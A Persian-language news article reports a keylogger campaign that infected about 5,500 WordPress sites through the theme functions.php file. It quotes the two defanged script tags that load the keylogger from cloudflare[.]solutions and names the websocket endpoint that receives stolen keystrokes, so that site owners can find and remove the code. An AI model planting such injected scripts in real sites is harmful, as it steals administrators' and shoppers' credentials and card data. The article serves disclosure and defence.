یکی از سیستم‌های مدیریت محتوای معروف و کاربردی، سیستم مدیریت محتوای ورد پرس است که البته کاملاً رایگان و اپن سورس (Open Source) است. ورد پرس توسط زبان محبوب PHP نوشته شده و از قدرت MySQL بهره می‌برد.

اما اخیراً مسئله نگران‌کننده‌ای پیش آمده است. در حال حاضر حدود 5500 سایت اینترنتی که از سیستم مدیریت محتوای ورد پرس استفاده می‌کنند به یک کد اسکریپت (Script) مخرب آلوده شده‌اند که با دامنه cloudflare.solutions کار می‌کند اما این اسکریپت (Script) هیچ ارتباطی با CDN معروف CloudFlare ندارد. بنا به گزارشی بیشتر وب‌سایت‌های آلوده شده از طریق این اسکریپت در الکسا رنکی بالای 200000 دارند و داده‌های دزدیده شده از این وب‌سایت‌ها به‌واسطه این اسکریپت مخرب، به آدرس /wss://cloudflare[.]solutions:8085 فرستاده می‌شوند.

این اسکریپت (Script) مخرب از keyLogger بهره می‌برد. keyLogger در دو نوع نرم‌افزاری و سخت‌افزاری وجود دارد. در این مورد قطعه کدی نرم‌افزاری است که کلیدهای فشرده‌شده توسط کاربر را ذخیره می‌کند و برای هکر ارسال می‌کند.

متأسفانه این اسکریپت مخرب در هر دو بخش فرانت‌اند (Frontend) و بک‌اند (Backend) سایت‌های قربانی اجرا می‌شود بنابراین به‌راحتی می‌تواند نام کاربری و رمز عبور مدیر وب‌سایت را هنگام ورود به پنل مدیریت به دست آورده و به این پنل دسترسی داشته باشد.

این اسکریپت درصورتی‌که بتواند در فرانت‌اند (frontend) سایت قربانی اجرا شود هم بسیار خطرناک است. در این حالت اسکریپت مخرب به‌راحتی می‌تواند اطلاعاتی که کاربران در فیلدهای comment وارد می‌کنند را ذخیره کرده و اطلاعات آن‌ها را به سرقت ببرد.

این اسکریپت درصورتی‌که روی یک وب‌سایت فروشگاه آنلاین بارگذاری شود و این چنین وب‌سایتی را آلوده کند می‌تواند اطلاعات حساس کاربران همچون اطلاعات کارت بانکی و رمز عبور آن‌ها را به دست بیاورد.

نکته کلیدی در مورد این اسکریپت مخرب قرار گرفتن در فایل اصلی function.php است، فایل استانداردی که در تمام تم‌های ورد پرس موجود است. وجود کد مخرب در این فایل باعث می‌شود که کد مخرب به‌راحتی بتواند روی انواع مرورگرهای قربانیان اجرا شود.

جالب اینجاست که این نمونه اسکریپت از دقیقاً همین دامنه اصلاً تازگی ندارد و این سومین باری است که دامنه cloudflare.solutions اسکریپتی مخرب وب‌سایت‌ها را آلوده می‌کند. حمله اول مربوط به ماه آوریل است که طی این حمله هکرها توانستند به سایت‌های تبلیغاتی نفوذ کرده و اسکریپت خود را پشت بنرهای تبلیغاتی قرار دهند.

حمله دوم در ماه نوامبر اتفاق افتاد. هکرها در این حمله کد اسکریپتی شبیه به ساختار گوگل آنالیتیکز (Google Analytics) نوشته بودند. این کد و حمله که Coinhive نام داشت از منابع سخت‌افزاری سیستم قربانیان برای به دست آوردن بیت کوین استفاده می‌کرد. این کد مخرب توانست بیشتر از 1833 سایت را آلوده کند.

راه‌حل مقابله با اسکریپت مخرب در ورد پرس

همان‌طور که گفته شد اسکریپت مخرب در فایل function.php قرار گرفته است و این کد به‌صورت زیر است:

< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script >

< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script >

به گفته محققان امنیت سایبری کمپانی Sucuri، وب‌سایت‌های آلوده شده به این اسکریپت به‌راحتی می‌توانند با جستجوی اسکریپت‌های فوق در فایل function.php در WordPress theme و حذف آن، از سرقت اطلاعات مهم مدیر وب‌سایت و کاربران جلوگیری کنند.

اگر تجربه‌ای در این خصوص داشته‌اید با ما به اشتراک بگذارید.

 برای اینکه از تمامی اخبار در اولین فرصت مطلع شوید با کانال تلگرام ما با آی دی faceitmag@ همراه باشید.